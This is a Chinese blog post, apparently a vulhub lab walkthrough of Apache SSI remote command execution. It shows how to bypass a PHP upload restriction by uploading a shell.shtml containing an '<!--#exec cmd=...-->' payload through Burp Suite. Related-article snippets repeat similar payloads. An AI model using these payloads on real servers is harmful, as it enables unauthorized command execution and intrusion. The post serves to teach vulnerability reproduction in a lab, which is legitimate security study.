Apache SSI 远程命令执行漏洞

最新推荐文章于 2024-03-28 14:05:11 发布
最新推荐文章于 2024-03-28 14:05:11 发布
阅读量302 收藏 1
点赞数
文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49506405/article/details/123211909
版权

漏洞描述
在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#exec cmd="id" -->语法执行任意命令。

漏洞环境

运行一个支持SSI与CGI的Apache服务器:

docker-compose up -d

环境启动后,访问http://your-ip:8080/upload.php,即可看到一个上传表单。

漏洞复现

正常上传PHP文件是不允许的,我们可以上传一个shell.shtml文件:

<!--#exec cmd="ls" -->

1.上传shell.shtml文件 

2.同时利用Burpsuit拦截请求

添加<!--#exec cmd="id" -->代码

点击send!

 成功上传,然后访问shell.shtml,可见命令已成功执行:

http://IP:端口/shell.shtml

 

大王叫我来巡山666
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
配置Apache支持shtml(SSI)的方法
09-15
主要介绍了配置Apache支持shtml(SSI)的方法,需要的朋友可以参考下
07 - vulhub - Apache SSI 远程命令执行漏洞,从青铜到王者的路线
2301_76223496的博客
03-23 822
当目标服务端存在不允许上传php后缀的文件时,但是同时又开启了SSI与CGI支持,攻击者就可以上传一个shtml文件,并利用 语法执行任意命令。因为 SSI 支持从 HTML 的注释行中读取命令执行,所以当 HTML 注释行中存在恶意的代码时,就会造成远程命令执行漏洞复现。
apache ssi 使用例子
09-01
在技术上,SSI就是在静态HTML文件中,根据需求插入不同的内容。 例如一个article的频道,每一个article内页都生成一个静态的HTML,如此时,header某个位置需要修改,则需要重新生成所有article的静态HTML文件。 如使用了SSI,可以在HTML文件中通过注释行嵌入经常会变化的共用部分,例如登入讯息等。可以不需要重新生成所有article,服务器会根据嵌入文件自动生成网页,输出到浏览器,如要修改则只需要修改嵌入的文件即可,无需重新生成所有HTML文件,服务器包含这种方式与php的include类似。
apache SHTML网页SSI使用详解
01-11
方法一:下面是详细的设置apache支持shtml的设置步骤开启includes模块运行shtml 0、开启php环境安装目录 (我的为D:\wamp\Apache2\conf下) 的httpd.conf 文件中的(大概408-409行处): 1、 AddType text/html .shtml AddOutputFilter INCLUDES .shtml 2、(F:/shz 为运行文件存放的地方) DocumentRoot “F:/shz” (大概150处) <Directory> (大概178处) 3、在Options Indexes FollowSymLinks 后
apache SSI教程文档
10-24
apache SSI教程文档,很详细,很好的参考资料.
(CVE-2019-0227)Axis<=1.4 远程命令执行漏洞
weixin_50464560的博客
11-11 5943
webapps/ROOT/shell.jsp,服务模块的工作路径是bin目录,这里利用相对路径写入ROOT目录,我们默认IP+port访问的就是ROOT目录,也就是tomcat默认根目录。调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行命令,就可以进行远程命令执行漏洞的利用。
漏洞复现-Apache SSI 远程命令执行漏洞
网安小白的博客
02-20 222
Apache SSI 远程命令执行漏洞复现
vulhub-httpd中ssi-rce
qq_26947429的博客
07-22 608
漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。 如果目标服务器开启了SSI与CGI支持,我们可以上传一个后缀为shtml文件 并利用<!--#exec cmd="id" -->语法执行任意命令。 第一步访问没有主页面利用目录扫描工具扫出目录 测试上传文件限制 很显然不能上传.php文件 可已上传一个.shtml文件来执行命令 文件里面是` <!--#exec cmd="whoami" -->` 命令执行成功! 然后开始进行菜刀连接 在1
Apache默认是不支持SSI如何给Apache增加SSI支持
09-15
SSI翻译成中文就是服务器端包含的意思,从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,下面给大家介绍下如何给Apache增加SSI支持
vulhub中的Apache SSI 远程命令执行漏洞
qq_59020256的博客
01-08 1246
这里已经执行成功了,注意这里需要加入/upload.php。
Apache Httpd 常见漏洞解析(全)
黑战士的博客
02-17 1865
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞。在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
07 - vulhub - Apache SSI 远程命令执行漏洞,最新阿里+头条+腾讯大厂Python笔试真题
最新发布
2401_83945997的博客
03-28 714
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
Vulhub之Shiro篇
weixin_56306210的博客
08-21 208
Vulhub之Shiro篇
Apache SSI 远程命令执行漏洞复现
dbabs的博客
02-20 296
Apache SSI 远程命令执行漏洞复现
[Apache SSI远程命令执行漏洞]
m0_71635484的博客
02-20 343
Apache SSI远程命令执行漏洞
Apache Solr 远程命令执行漏洞复现(CVE-2017-12629)
0xSec
12-26 928
Solr 是基于 Lucene 的面向企业搜索的 web 应用 ,Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口。用户可以通过 http 请求,向搜索引擎服务器提交一定格式的 XML 文件,生成索引;也 可以通过 Http Get 操作提出查找请求,并得到 xml/json 格式的返回结果。Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。
CVE-2017-15715漏洞SSI-RCE漏洞
07-27
SSI-RCE漏洞是一种服务器端包含(SSI漏洞,可能导致远程命令执行SSI是一种服务器端处理动态内容的技术,它允许将外部文件包含到网页中。如果服务器未正确配置和过滤用户提供的输入,攻击者可以通过注入恶意代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值